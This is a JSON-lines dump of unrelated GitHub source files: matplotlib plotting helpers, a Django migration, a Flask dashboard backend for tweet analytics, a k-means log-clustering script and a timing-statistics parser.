else:\n        plt.figure(figsize=(6,4))\n\n    # Customize the axes\n    ax = plt.gca()\n    fig = plt.gcf()\n\n    # Make sure the Y data is at least 2-D\n    Y = np.atleast_2d(Y)\n\n    # Ensure the compatibility of the time and Y data\n    if Y.shape[0] != time.shape[0] and Y.shape[1] != time.shape[0]:\n        raise ValueError(\n            '''The Shape of X, [{}], is not compatible \n            with the shape of Y, [{}]...\\n Exiting'''\n            .format(time.shape,Y.shape))\n    elif Y.shape[0] != time.shape[0]: \n        Y = Y.T\n\n    if Y.shape[1] != len(labels):\n        raise ValueError('Please ensure the number of legend labels matches the number of data plots.')\n\n    ax.xaxis.set_major_formatter(formatter)\n\n    # Plot all of the available data\n    for i in np.arange(0,len(labels)):\n\n        if 'sigma' in labels[i].lower():\n            plt.plot(np.arange(Y.shape[0]), Y[:,i],\n                label=r'\\textbf{' + labels[i] + '}',\n                color='k',\n                linestyle=plot_linestyle[1], # Linestyle given from array at the beginning of this document\n                linewidth=2)\n        else:\n            if log_y:\n                plt.semilogy(np.arange(Y.shape[0]), Y[:,i],\n                    label=r'\\textbf{' + labels[i] + '}',\n                    linestyle=plot_linestyle[i], # Linestyle given from array at the beginning of this document\n                    linewidth=2) \n            else:\n                plt.plot(np.arange(Y.shape[0]), Y[:,i],\n                    label=r'\\textbf{' + labels[i] + '}',\n                    linestyle=plot_linestyle[i], # Linestyle given from array at the beginning of this document\n                    linewidth=2) \n\n    ax.spines['right'].set_color('none')\n    ax.spines['top'].set_color('none')\n    ax.xaxis.set_ticks_position('bottom')\n    ax.yaxis.set_ticks_position('left')\n\n    fig.autofmt_xdate()\n\n    if tick_increment is not None:\n        loc = mtick.MultipleLocator(base=tick_increment) # this locator puts ticks at regular intervals\n        ax.yaxis.set_major_locator(loc)\n\n    if not isinstance(ymax,np.ndarray):\n        # Set the window limits\n        plt.ylim(np.amin(Y) - ymin * abs(np.amin(Y)),\n                 np.amax(Y) + ymax * abs(np.amax(Y)-np.amin(Y)))\n    else:\n        plt.ylim(ymin[0],ymax[0])\n\n    # Show the grid, if desired\n    ax.grid(grid)\n\n    ax.set_axisbelow(True)\n\n    if not log_y:\n        # X tick locations\n        xloc = mtick.MaxNLocator(\n            nbins=7, # Maximum number of bins\n            steps = [1 , 2, 2.5, 5, 
10], # valid step increments\n            prune='both').tick_values(*plt.xlim()) \n\n        # Y tick locations\n        yloc = mtick.MaxNLocator(\n            nbins=6, # Maximum number of bins\n            steps = [1, 2, 2.5, 5, 10], # valid step increments\n            prune='upper').tick_values(*plt.ylim())\n\n        # Set the tickmarks at the given x and y locations\n        ax.set_xticks(xloc)\n        ax.set_yticks(yloc)\n\n    if labels[0]:\n        # Show the legend\n        ax.legend(ncol=num_col,loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n\n    # Create the axis labels\n    plt.xlabel(r'\\textbf{' + xlabel + '}', labelpad=xlabelpad)\n    plt.ylabel(r'\\textbf{' + ylabel + '}', labelpad=5)\n\n    # Tighten the layout so labels and titles fit inside the figure\n    plt.tight_layout(pad=1.2) \n\n    if save_plot:\n        if folder is not None:\n            # Ensure that the folder we want to save to exists\n            if not os.path.exists(folder):\n                os.makedirs(folder)\n\n            filename = folder + '/' + filename\n\n        # Save the plot in the requested format \n        if file_type == 'png':\n            plt.savefig('{}.png'\\\n                .format(filename),transparent=transparent) \n        elif file_type == 'pdf':\n            plt.savefig('{}.pdf'\\\n                .format(filename)) \n        elif file_type == 'svg':\n            plt.savefig('{}.svg'\\\n                .format(filename),transparent=transparent,facecolor=None) \n\n    if showplot:\n        plt.show()\n\n    # Clear the axes and figure\n    plt.clf()\n    plt.cla()\n    plt.close()\n\ndef plot_spectrogram(\n    time,\n    spectrogram,\n    frequencyInterval,\n    size=(12,4),\n    showplot = False,\n    save_plot = False,\n    transparent = False,\n    folder = None,\n    filename = 'Spectrogram',\n    xlabelpad = 5, \n    ylabelpad = 5, \n    file_type='pdf',\n    date_format='%I:00 %p, %b %d'\n    ):\n\n    # import LogNorm directly: the module-level 'colors' list defined further below\n    # shadows the 'matplotlib.colors as colors' import by the time this function runs\n    from matplotlib.colors import LogNorm\n\n    yi = np.arange(-0.0, spectrogram.shape[1] * frequencyInterval,frequencyInterval)\n    xi = np.arange(0.0,spectrogram.shape[0])\n    X, Y = np.meshgrid(xi, yi)\n    plt.figure(figsize=size)\n\n    # Customize the axes\n    ax = plt.gca()\n    # transpose so the (time, frequency) array matches the (frequency, time) grid\n    plt.pcolormesh(X,Y,spectrogram.T,cmap='cividis',norm=LogNorm(vmin=np.amin(spectrogram),vmax=np.amax(spectrogram)))\n\n    formatter = MyFormatter(time,fmt=date_format)\n    ax.xaxis.set_major_formatter(formatter)\n    ax.tick_params(labelsize=18)\n\n    plt.colorbar()\n\n    plt.ylabel(r'\\textbf{Frequency (Hz)}', labelpad=ylabelpad,fontsize=22)\n    plt.xlabel(r'\\textbf{Time}', labelpad=xlabelpad,fontsize=22)\n\n    plt.tight_layout(pad=1.2)\n\n    if save_plot:\n        if folder is not None:\n            # Ensure that the folder we want to save to exists\n            if not os.path.exists(folder):\n                os.makedirs(folder)\n\n            filename = folder + '/' + filename\n\n        # Save the plot in the requested format \n        if file_type == 'png':\n            plt.savefig('{}.png'\\\n                
.format(filename),transparent=transparent) \n elif file_type == 'pdf':\n plt.savefig('{}.pdf'\\\n .format(filename)) \n elif file_type == 'svg':\n plt.savefig('{}.svg'\\\n .format(filename)) \n \n plt.show()\n\ndef plot_histogram(data,labels,xlabel,ylabel,filename,template='publication',ymax=0,\n folder='figures',transparent=True,file_type='png',num_col = 2,legend_loc='best',nbins=20):\n \n if not os.path.exists(folder):\n os.makedirs(folder)\n \n if template.lower() == 'publication':\n plt.figure(figsize=(6,4))\n else:\n plt.figure(figsize=(12,4))\n \n data = np.atleast_2d(data)\n \n if data.shape[0] > data.shape[1]:\n data = data.T\n \n colors = ['#e41a1c', '#377eb8', '#4daf4a', '#984ea3', '#ff7f00', '#ffff33', '#a65628']\n \n ax = plt.gca()\n \n max_y = 0.\n \n # the histogram of the data\n for i in range(data.shape[0]):\n n, bins, patches = plt.hist(data[i,:], nbins, density=True, facecolor=colors[i], alpha=0.90,label=labels[i])\n \n if np.amax(n) > max_y:\n max_y = np.amax(n)\n\n ax.legend(ncol=num_col,loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n \n plt.ylim(0,max_y + ymax)\n\n plt.xlabel(r'\\textbf{' + xlabel + '}')\n plt.ylabel(r'\\textbf{' + ylabel + '}')\n plt.grid(False)\n \n filename = folder + '/' + filename\n \n # Save the pdf of the plot \n if file_type == 'png':\n plt.savefig('{}.png'\\\n .format(filename),transparent=transparent) \n elif file_type == 'pdf':\n plt.savefig('{}.pdf'\\\n .format(filename)) \n elif file_type == 'svg':\n plt.savefig('{}.svg'\\\n .format(filename)) \n \n plt.show()\n \n\ncolors = ['#e41a1c', '#377eb8', '#4daf4a', '#984ea3', '#ff7f00', '#ffff33', '#a65628']\n\ndef box_plot_compare(data,labels,\n xlabel='',ylabel='Latency (ms)',log_y=False,\n folder='figures',filename='boxplot',savefig=False,\n transparent=True,color_order=np.arange(len(colors)),template='publication',\n xtickpad=5,showfliers=False,legend_loc='best',max_cutoff=0,min_cutoff=0,plot_type='violin',extension='png',inferenceLocations=None):\n thisColors = [colors[i] for i in color_order]\n if template.lower() == 'publication':\n fig = plt.figure(figsize=(6,4))\n elif template.lower() == 'wide':\n fig = plt.figure(figsize=(12,4))\n elif template.lower() == 'presentation':\n fig = plt.figure(figsize=(9,6))\n else:\n fig = plt.figure()\n \n position = [i+1 for i in range(data.shape[1])]\n tickPositions = []\n phantomLines = []\n \n for i in range(data.shape[-1]):\n \n max_index = data.shape[0] - max_cutoff\n min_index = min_cutoff\n \n thisData = np.sort(data[...,i],axis=0)[min_index:max_index,:]\n \n if plot_type=='violin':\n\n violin_parts = plt.violinplot(thisData,\n positions = position,\n showmeans=False,\n showmedians=False,\n showextrema=False)\n\n for counter, pc in enumerate(violin_parts['bodies']):\n pc.set_facecolor(colors[counter])\n pc.set_edgecolor('black')\n pc.set_alpha(1)\n\n if i == 0:\n line, = plt.plot([1,1],color=colors[counter])\n phantomLines.append(line)\n \n else:\n \n bp = plt.boxplot(thisData,\n positions=position,\n showfliers=showfliers,\n patch_artist=True,\n meanline=False,\n notch=False,\n medianprops={'color':'black',\n 'linewidth':2},\n whiskerprops={'linewidth':2},\n capprops={'linewidth':2},\n widths=0.75)\n \n for counter,patch in enumerate(bp['boxes']):\n # change outline color\n patch.set(color=colors[counter], linewidth=2)\n patch.set_facecolor(colors[counter])\n 
\n if i == 0:\n line, = plt.plot([1,1],color=colors[counter])\n phantomLines.append(line)\n \n tickPositions.append(np.mean(position)) \n position = [position[i] + data.shape[1] + 1 for i in range(len(position))]\n \n ax = plt.gca()\n\n if log_y == True:\n ax.set_yscale('log')\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n ax.set_xticklabels([r'\\textbf{' + label + '}' for label in labels])\n ax.set_xticks(tickPositions)\n ax.tick_params(axis='x', which='major', pad=xtickpad)\n ax.legend(tuple(phantomLines),tuple(inferenceLocations),loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n \n [phantomLines[i].set_visible(False) for i in range(len(phantomLines))]\n \n plt.xlabel(r'\\textbf{' + xlabel + '}')\n plt.ylabel(r'\\textbf{' + ylabel + '}')\n \n if not os.path.exists(folder):\n os.makedirs(folder)\n \n plt.tight_layout(pad=1.5)\n \n if savefig:\n plt.savefig(folder + '/' + filename + '.' + extension,transparent=transparent)\n\n plt.show()\n\n\ndef bar_chart_compare(data,labels,dataLabels,\n xlabel='',ylabel='Latency (ms)',log_y=False,\n folder='figures',filename='boxplot',savefig=False,\n transparent=True,color_order=np.arange(len(colors)),template='publication',max_cutoff=0,min_cutoff=0,\n xtickpad=5,showfliers=False,legend_loc='best',extension='png'):\n thisColors = [colors[i] for i in color_order]\n if template.lower() == 'publication':\n fig = plt.figure(figsize=(6,4))\n elif template.lower() == 'wide':\n fig = plt.figure(figsize=(12,4))\n elif template.lower() == 'presentation':\n fig = plt.figure(figsize=(9,6))\n else:\n fig = plt.figure()\n \n x = np.arange(data.shape[-1])\n tickPositions = x.tolist() \n phantomLines = []\n width = .7 / len(dataLabels)\n \n means = np.mean(data,axis=0)\n stdev = np.std(data,axis=0)\n\n\n for j in range(data.shape[-2]):\n\n plt.bar(x - 0.35 + (j+.5) * width, means[j,:], width, label=r'\\textbf{' + dataLabels[j] + '}')\n\n# tickPositions.append(np.mean(position)) \n# position = [position[i] + data.shape[1] + 1 for i in range(len(position))]\n \n ax = plt.gca()\n\n if log_y == True:\n ax.set_yscale('log')\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n\n ax.set_xticklabels([r'\\textbf{' + label + '}' for label in labels])\n ax.set_xticks(tickPositions)\n ax.tick_params(axis='x', which='major', pad=xtickpad)\n# ax.legend(tuple(phantomLines),tuple(dataLabels),loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n plt.legend(loc=legend_loc,framealpha=float(not transparent)).get_frame().set_edgecolor('k')\n \n plt.xlabel(r'\\textbf{' + xlabel + '}')\n plt.ylabel(r'\\textbf{' + ylabel + '}')\n \n if not os.path.exists(folder):\n os.makedirs(folder)\n \n plt.tight_layout(pad=1.5)\n \n if savefig:\n plt.savefig(folder + '/' + filename + '.' 
+ extension,transparent=transparent)\n\n plt.show()\n \n\ndef box_plot(data,labels,ylabel='Latency (ms)',log_y=False,\n folder='figures',filename='boxplot',savefig=False,\n transparent=True,color_order=np.arange(len(colors)),\n template='publication',title=''):\n thisColors = [colors[i] for i in color_order]\n if template.lower() == 'publication':\n fig = plt.figure(figsize=(6,4))\n elif template.lower() == 'wide':\n fig = plt.figure(figsize=(12,4))\n elif template.lower() == 'presentation':\n fig = plt.figure(figsize=(9,6))\n else:\n fig = plt.figure()\n # Create an axes instance\n# ax = fig.add_axes([0,0,1,1])\n # Create the boxplot\n bp = plt.boxplot(data,\n showfliers=False,\n patch_artist=True,\n meanline=False,\n notch=False,\n medianprops={'color':'black',\n 'linewidth':2},\n whiskerprops={'linewidth':2},\n capprops={'linewidth':2})\n ax = plt.gca()\n \n for patch, color in zip(bp['boxes'], thisColors):\n # change outline color\n patch.set(color=color, linewidth=2)\n\n patch.set_facecolor(color)\n\n if log_y == True:\n ax.set_yscale('log')\n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n ax.set_title(r'\\textbf{' + title + '}',fontsize=22)\n\n ax.set_xticklabels([r'\\textbf{' + label + '}' for label in labels])\n plt.ylabel(r'\\textbf{' + ylabel + '}')\n \n if not os.path.exists(folder):\n os.makedirs(folder)\n \n plt.tight_layout(pad=1.5)\n \n if savefig:\n plt.savefig(folder + '/' + filename + '.png',transparent=transparent)\n\n plt.show()\n \n\ndef bar_plot(X,Y,xlabel,ylabel,\n title='',\n ymax = 0.1, \n ymin = 0.1,\n tick_increment = None,\n showplot = False,\n save_plot = False,\n transparent = False,\n grid = False, \n folder = None,\n filename = 'Plot',\n num_col = 2,\n legend_loc = 'upper right',\n experimental_args = None,\n xlabelpad = 5, \n hide_origin = False, \n for_notebook=False,\n template='publication',\n file_type='pdf'):\n \n if template.lower() == 'large':\n plt.figure(figsize=(10,6.67))\n elif template.lower() == 'wide':\n plt.figure(figsize=(12,4))\n else:\n plt.figure()\n\n # Customize the axes\n ax = plt.gca()\n \n plt.bar([str(value) for value in X],Y)\n \n ax.spines['right'].set_color('none')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n \n # Show the grid, if desired\n ax.grid(grid)\n ax.set_axisbelow(True)\n\n # Create the axis labels\n plt.xlabel(r'\\textbf{' + xlabel + '}', labelpad=xlabelpad)\n plt.ylabel(r'\\textbf{' + ylabel + '}', labelpad=5)\n plt.title(r'\\textbf{' + title + '}',fontsize=22)\n\n # Adjust the page layout filling the page using the new tight_layout command\n plt.tight_layout(pad=1.2) \n \n \n\n if save_plot:\n if folder is not None:\n # Ensure that the folder we want to save to exists\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n filename = folder + '/' + filename\n\n # Save the pdf of the plot \n if file_type == 'png':\n plt.savefig('{}.png'\\\n .format(filename),transparent=transparent) \n elif file_type == 'pdf':\n plt.savefig('{}.pdf'\\\n .format(filename)) \n elif file_type == 'svg':\n plt.savefig('{}.svg'\\\n .format(filename),transparent=transparent) \n\n if showplot:\n plt.show()\n\n # Clear the axes and figure\n plt.clf()\n plt.cla()\n 
plt.close()\n","repo_name":"danielnewman09/Dissertation","sub_path":"Dissertation-Notebooks/dependencies/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":42669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25648860801","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('diseases', '0006_case_location'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Location',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('name', models.CharField(max_length=300)),\n ],\n ),\n migrations.AlterField(\n model_name='case',\n name='location',\n field=models.ForeignKey(to='diseases.Location'),\n ),\n ]\n","repo_name":"Omrigan/diseases","sub_path":"diseases/migrations/0007_auto_20150518_0945.py","file_name":"0007_auto_20150518_0945.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44668266350","text":"# ====================================\r\n# COMP90024 Cluster and Cloud Computing\r\n# Group 22 - Assignment 2\r\n# Ran Liang 1162222\r\n# Yulun Huang 910398\r\n# Yubo Sun 1048638\r\n# Yanhao Wang 1142087\r\n# Xindi Fang 749394\r\n# Last Updated: 2021-05-25\r\n# Description:\r\n# Related DB Name:\r\n# ====================================\r\n\r\nfrom flask import Flask\r\nfrom flask import render_template\r\nfrom flask import jsonify\r\nfrom flask import request\r\nfrom datetime import timedelta\r\nimport utils_source\r\nimport utils_time\r\nimport utils_vaccine\r\nimport util_unemployment\r\nimport utils_language\r\n\r\napp = Flask(__name__)\r\napp.config['DEBUG'] = True\r\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = timedelta(seconds=1)\r\n\r\n\r\n@app.route('/')\r\ndef hello_world():\r\n return render_template('main.html')\r\n\r\n\r\n@app.route('/main.html', methods=['GET', 'POST'])\r\ndef main_page():\r\n return render_template('main.html')\r\n\r\n\r\n@app.route('/language.html', methods=['GET', 'POST'])\r\ndef language():\r\n return render_template('language.html')\r\n\r\n\r\n@app.route('/source.html', methods=['GET', 'POST'])\r\ndef source():\r\n return render_template('source.html')\r\n\r\n\r\n@app.route('/period.html', methods=['GET', 'POST'])\r\ndef period():\r\n return render_template('period.html')\r\n\r\n\r\n@app.route('/vaccine.html', methods=['GET', 'POST'])\r\ndef vaccine():\r\n return render_template('vaccine.html')\r\n\r\n\r\n@app.route('/unemployment.html', methods=['GET', 'POST'])\r\ndef unemployment():\r\n return render_template('unemployment.html')\r\n\r\n\r\n@app.route('/aboutUs.html', methods=['GET', 'POST'])\r\ndef about_us():\r\n return render_template('aboutUs.html')\r\n# 1 -------------------------------------------------------------- Language start\r\n@app.route('/language/l1')\r\ndef get_language_l1_data():\r\n language_l1_data = utils_language.get_language_l1_data()\r\n return jsonify(language_l1_data)\r\n\r\n\r\n@app.route('/language/l2')\r\ndef get_language_l2_data():\r\n language_l2_data = utils_language.get_language_l2_data()\r\n return jsonify(language_l2_data)\r\n\r\n\r\n@app.route('/language/c1')\r\ndef get_language_c1_scatter_data():\r\n language_c1_scatter_data = utils_language.get_language_c1_data()\r\n return 
jsonify(language_c1_scatter_data)\r\n\r\n\r\n@app.route('/language/r1', methods=['GET', 'POST'])\r\ndef get_language_r1_data():\r\n    language_r1_data = utils_language.get_language_r1_data()\r\n    return jsonify(language_r1_data)\r\n\r\n\r\n@app.route('/language/r2', methods=['GET', 'POST'])\r\ndef get_language_r2_data():\r\n    language_r2_data = utils_language.get_language_r2_data()\r\n\r\n    return jsonify(language_r2_data)\r\n\r\n\r\n# 1 -------------------------------------------------------------- Language end\r\n\r\n# 2 -------------------------------------------------------------- Source start\r\n\r\n@app.route('/source/l1')\r\ndef get_source_l1_data():\r\n    source_l1_data = {'legend': ['Android', 'IOS'], 'xAxis': [str(i).zfill(2) for i in range(24)],\r\n                      'data': utils_source.source_time_plot()}\r\n    return jsonify(source_l1_data)\r\n\r\n\r\n@app.route('/source/l2')\r\ndef get_source_l2_data():\r\n    source_l2_data = {'legend': ['polarity', 'subjectivity'], 'xAxis': ['Android', 'IOS'],\r\n                      'data': utils_source.source_polarity_subjectivity()}\r\n    return jsonify(source_l2_data)\r\n\r\n\r\n@app.route('/source/c12')\r\ndef get_source_c12_scatter_data():\r\n    # source_region_pol() returns the Android data first, then the iOS data.\r\n    android_data, ios_data = utils_source.source_region_pol()\r\n    source_c12_scatter_data = {'android': android_data, 'ios': ios_data}\r\n    return jsonify(source_c12_scatter_data)\r\n\r\n\r\n@app.route('/source/r1')\r\ndef get_source_r1_data():\r\n    source_r1_data = {'legend': ['Android', 'IOS'],\r\n                      'yAxis': ['Sydney', 'Melbourne', 'Brisbane', 'Perth (WA)', 'Adelaide',\r\n                                'Gold Coast', 'Canberra', 'Newcastle'],\r\n                      'data': utils_source.source_region_percentage()}\r\n    return jsonify(source_r1_data)\r\n\r\n\r\n@app.route('/source/r2', methods=['GET', 'POST'])\r\ndef get_source_r2_data():\r\n    source_r2_original_data = utils_source.source_cloud()\r\n    source_r2_data = {'android': source_r2_original_data[0]['Twitter for Android'],\r\n                      'ios': source_r2_original_data[1]['Twitter for iPhone']\r\n                      }\r\n    return jsonify(source_r2_data)\r\n\r\n\r\n# 2 -------------------------------------------------------------- Source end\r\n\r\n# 3 -------------------------------------------------------------- Period start\r\n@app.route('/period/l1')\r\ndef get_period_l1_data():\r\n    period_l1_data = {'xAxis': [str(i).zfill(2) for i in range(24)],\r\n                      'data': utils_time.time_count_trend()}\r\n    return jsonify(period_l1_data)\r\n\r\n\r\n@app.route('/period/l2')\r\ndef get_period_l2_data():\r\n    period_l2_data = {'legend': ['polarity', 'subjective'],\r\n                      'xAxis': [str(i).zfill(2) for i in range(24)],\r\n                      'data': utils_time.time_sub_pol_trend()}\r\n    return jsonify(period_l2_data)\r\n\r\n\r\n@app.route('/period/c1')\r\ndef get_period_c1_scatter_data():\r\n    period_c1_scatter_data = {'timeline': [str(i).zfill(2) for i in range(24)],\r\n                              'data': utils_time.time_map_24()}\r\n    return jsonify(period_c1_scatter_data)\r\n\r\n\r\n@app.route('/period/r1')\r\ndef get_period_r1_data():\r\n    period_r1_data = {'periods': [str(i).zfill(2) for i in range(24)],\r\n                      'xAxis': ['Sydney', 'Melbourne', 'Brisbane', 'Perth (WA)', 'Adelaide',\r\n                                'Gold Coast', 'Canberra', 'Newcastle'],\r\n                      'data': utils_time.time_region_count_percent_plot()}\r\n    return jsonify(period_r1_data)\r\n\r\n\r\n@app.route('/period/r2', methods=['GET', 'POST'])\r\ndef get_period_r2_data():\r\n    period_r2_data = utils_time.time_cloud()\r\n\r\n    return jsonify(period_r2_data)\r\n\r\n\r\n# 3 -------------------------------------------------------------- Period end\r\n\r\n# 4 
-------------------------------------------------------------- Vaccine start\r\n@app.route('/vaccine/l1')\r\ndef get_vaccine_l1_data():\r\n vaccine_l1_original_date = utils_vaccine.vaccine_date_count()\r\n vaccine_l1_data = {'xAxis': vaccine_l1_original_date[0],\r\n 'data': vaccine_l1_original_date[1]}\r\n return jsonify(vaccine_l1_data)\r\n\r\n\r\n@app.route('/vaccine/l2')\r\ndef get_vaccine_l2_data():\r\n vaccine_l2_original_data = utils_vaccine.vaccine_date_polarity_sub()\r\n source_l2_data = {'legend': ['polarity', 'subjective'],\r\n 'xAxis': vaccine_l2_original_data[0],\r\n 'data': [vaccine_l2_original_data[1], vaccine_l2_original_data[2]]}\r\n return jsonify(source_l2_data)\r\n\r\n\r\n@app.route('/vaccine/c1')\r\ndef get_vaccine_c1_scatter_data():\r\n vaccine_c1_scatter_data = {'data_name': 'Average polarity about vaccine',\r\n 'data': utils_vaccine.vaccine_map()}\r\n return jsonify(vaccine_c1_scatter_data)\r\n\r\n\r\n@app.route('/vaccine/r1')\r\ndef get_vaccine_r1_data():\r\n vaccine_r1_data = {'legend': ['Question 1 Disagree', 'Question 1 Neutral', 'Question 1 Agree',\r\n 'Question 2 Disagree', 'Question 2 Neutral', 'Question 2 Agree'],\r\n 'data': utils_vaccine.vaccine_aurin_compare()}\r\n return jsonify(vaccine_r1_data)\r\n\r\n\r\n@app.route('/vaccine/r2', methods=['GET', 'POST'])\r\ndef get_vaccine_r2_data():\r\n vaccine_r2_data = utils_vaccine.vaccine_cloud()\r\n\r\n return jsonify(vaccine_r2_data)\r\n\r\n\r\n# 4 -------------------------------------------------------------- Vaccine end\r\n\r\n# 5 -------------------------------------------------------------- Unemployment start\r\n@app.route('/unemployment/l1')\r\ndef get_unemployment_l1_data():\r\n unemployment_l1_original_data = util_unemployment.unemp_date_count()\r\n unemployment_l1_data = {'xAxis': unemployment_l1_original_data[0],\r\n 'data': unemployment_l1_original_data[1]}\r\n return jsonify(unemployment_l1_data)\r\n\r\n\r\n@app.route('/unemployment/l2')\r\ndef get_unemployment_l2_data():\r\n unemployment_l2_data = util_unemployment.unemp_date_polarity_sub()\r\n unemployment_l2_data = {'legend': ['polarity', 'subjective'],\r\n 'xAxis': unemployment_l2_data[0],\r\n 'data': [unemployment_l2_data[1], unemployment_l2_data[2]]}\r\n return jsonify(unemployment_l2_data)\r\n\r\n\r\n@app.route('/unemployment/c1')\r\ndef get_unemployment_scatter_c1_data():\r\n unemployment_scatter_c1_data = {'data_name': 'Average polarity for unemployment',\r\n 'data': util_unemployment.unemp_map()}\r\n return jsonify(unemployment_scatter_c1_data)\r\n\r\n\r\n@app.route('/unemployment/r1')\r\ndef get_unemployment_r1_data():\r\n unemployment_r1_original_data = util_unemployment.unemp_with_aurin()\r\n unemployment_r1_data = {'legend': unemployment_r1_original_data[0],\r\n 'xAxis': [unemployment_r1_original_data[1], unemployment_r1_original_data[2]],\r\n 'data': [unemployment_r1_original_data[3], unemployment_r1_original_data[4]]}\r\n return jsonify(unemployment_r1_data)\r\n\r\n\r\n@app.route('/unemployment/r2')\r\ndef get_unemployment_r2_data():\r\n unemployment_r2_data = util_unemployment.unemployment_cloud()\r\n return jsonify(unemployment_r2_data)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host=\"0.0.0.0\", port=5000)\r\n","repo_name":"TyrionGump/COMP90024_proj2","sub_path":"frontend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9344,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37826808288","text":"from sklearn.cluster import KMeans\r\nfrom sklearn.utils 
import resample\r\nimport numpy as np\r\nfrom tmp_rate_clusters import rate_cluster, upsample_class\r\n\r\n#load raw numeric data (first column is the class label, the rest are event counts)\r\nf = open(\"Hadoop_EventCount\",\"r\")\r\nx, y = len(f.readline().split()), 0\r\nf.close()\r\nf = open(\"Hadoop_EventCount\",\"r\")\r\nfor line in f:\r\n    y+=1\r\nf.close()\r\nx_values, y_values = np.zeros((y,x-1)), np.zeros((y,))\r\nf = open(\"Hadoop_EventCount\",\"r\")\r\nindex = 0\r\nfor line in f:\r\n    data = line.split()\r\n    y_values[index], x_values[index] = data[0], data[1:]\r\n    index+=1\r\nf.close()\r\n\r\n#upsample\r\nx_values, y_values = upsample_class(x_values, y_values, upsample_class=0, ratio=5)\r\n#downsample\r\nx_values, y_values = resample(x_values, y_values, n_samples = 100)\r\n\r\n#cluster\r\n#get a list of cluster labels\r\ncluster_count = 80\r\nkmeans = KMeans(init=\"random\", n_clusters=cluster_count, random_state=0).fit(x_values)\r\ncluster_labels = kmeans.predict(x_values)\r\n\r\n#evaluate\r\nscores = rate_cluster(cluster_labels, y_values, cluster_count, online_clusters=[], online_classes=[])\r\nprint(\"final scores\")\r\nprint(scores)","repo_name":"alexleeuci/eecs159a","sub_path":"loglizer/LogClusteringHadoopDemos_unrefined/tmp_cluster_and_eval.py","file_name":"tmp_cluster_and_eval.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28140989736","text":"import numpy as np\n\nf = open(\"timestat.txt\", \"r\")\nll1 = (f.read()).split(\"\\n\\n\")\nf.close()\nll2 = [i.strip() for i in ll1]\n\nreal = [i.split(\"\\n\")[0].split(\" \")[-1].strip() for i in ll2]\nreal = [int(i.split('m')[0]) * 60 + float(i.split('m')[1][:-1]) for i in real]\n# print(len(real))\n\nuser = [i.split(\"\\n\")[1].split(\" \")[-1].strip() for i in ll2]\nuser = [int(i.split('m')[0]) * 60 + float(i.split('m')[1][:-1]) for i in user]\n\nsys = [i.split(\"\\n\")[2].split(\" \")[-1].strip() for i in ll2]\nsys = [int(i.split('m')[0]) * 60 + float(i.split('m')[1][:-1]) for i in sys]\n\n\nreal = np.array(real)\nuser = np.array(user)\nsys = np.array(sys)\n\nreal_avg = np.mean(real)\nuser_avg = np.mean(user)\nsys_avg = np.mean(sys)\n\nreal_std = np.std(real)\nuser_std = np.std(user)\nsys_std = np.std(sys)\n\n\ndef within_func(x, s, e):\n    # 1 if x lies within the closed interval [s, e], else 0\n    return int(s <= x <= e)\n\nnum_real = sum([within_func(i, real_avg - real_std, real_avg + real_std) for i in real])\n# print(num_real)\nnum_user = sum([within_func(i, user_avg - user_std, user_avg + user_std) for i in user])\nnum_sys = sum([within_func(i, sys_avg - sys_std, sys_avg + sys_std) for i in sys])\n\n\nprint(\"Number of runs: \", len(real))\nprint(\"Average Time statistics\")\nprint(\"real: \", str(round(real_avg, 4)) + \"s\", \" user: \", str(round(user_avg, 4)) + \"s\", \" sys: \", str(round(sys_avg, 4)) + \"s\")\nprint(\"Standard deviation of Time statistics\")\nprint(\"real: \", str(round(real_std, 4)) + \"s\", \" user: \", str(round(user_std, 4)) + \"s\", \" sys: \", str(round(sys_std, 4)) + \"s\")\nprint(\"Number of runs within (average - standard deviation) to (average + standard deviation)\")\nprint(\"real: \", num_real, \" user: \", num_user, \" sys: \", num_sys)","repo_name":"Riyaagrawal2001/wncc-timestat","sub_path":"timestat.py","file_name":"timestat.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9887445977","text":"from gzip import GzipFile\nfrom typing import List, Tuple\n\nimport 
